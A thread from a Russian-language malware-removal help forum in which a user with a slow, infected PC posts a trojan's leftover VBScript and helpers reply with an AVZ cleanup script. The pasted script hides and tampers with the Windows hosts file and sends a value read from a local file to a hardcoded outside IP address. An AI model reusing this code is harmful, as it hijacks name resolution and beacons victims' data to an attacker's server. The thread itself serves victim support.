-
Junior Member
- Вес репутации
- 42
Загрузка ЦП
Компьютер ужасно висит, не открываются половина сайтов.
ЦП загружен на 90-100% постоянно.
Подозреваю что причина в cmd.exe и svchost.exe (большая загрузка ЦП). При завершении процесса cmd.exe загрузка ЦП становится 10-20%.
Eset Smart Security нашел и удалил файл троян lomay_manya.bat в директории C:\Program Files\j1\j1
От трояна остались файлы ko.txt и test.vbs
Содержимое test.vbs
Код:
Set oFSO = CreateObject ("Scripting.FileSystemObject")
sWinDir = oFSO.GetSpecialFolder (0)
'WScript.Echo sWinDir
set fso = CreateObject("Scripting.FileSystemObject")
set ts = fso.OpenTextFile(sWinDir+"\System32\drivers\etc\hоsts", 8, true, -2)
'ts.WriteLine "Инфа"
ts.CLOSE
'Скрываем файл
set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.GetFile(sWinDir+"\System32\drivers\etc\hosts")
file.Attributes = 2
Const strFilePath = "ko.txt"
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
Dim fso, objFile, objNewFile, s
Set fso = CreateObject("Scripting.FileSystemObject")
'открываем файл для чтения
Set objFile = fso.OpenTextFile(strFilePath,1)
s=objFile.ReadLine
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://94.249.190."+"123:45612/stat/tuk/"+s, False
o.send
Содержимое ko.txt
LOG.rar
hijackthis.log
Последний раз редактировалось efremovxp; 08.10.2012 в 01:14.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Уважаемый(ая) efremovxp, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
-
-
Выполните скрипт
Код:
begin
SetAVZPMStatus(false);
RebootWindows(false);
end.
компьютер перезагрузится после этого сделайте логи заново. Самостоятельно настройки AVZ не меняйте !
- - - Добавлено - - -
зы. не надо архивировать всю папку с логами, прикрепите только то что просят !
-
-
Junior Member
- Вес репутации
- 42
-
-